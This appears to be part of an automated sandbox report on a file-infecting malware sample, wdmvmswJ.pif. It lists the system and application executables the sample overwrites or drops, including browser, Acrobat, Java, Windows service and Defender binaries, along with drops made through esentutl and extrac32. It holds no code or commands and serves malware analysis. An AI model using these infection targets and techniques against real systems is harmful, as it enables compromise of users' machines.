Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\vds.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\snmptrap.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\Spectrum.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\Locator.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\SysWOW64\perfhost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\VSSVC.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\wbengine.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\SearchIndexer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\TieringEngineService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\AgentService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\sppsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\SensorDataService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\msdtc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior

Drops PE files

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\snmptrap.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\Spectrum.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\user\AppData\Local\Temp\x.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\sppsvc.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
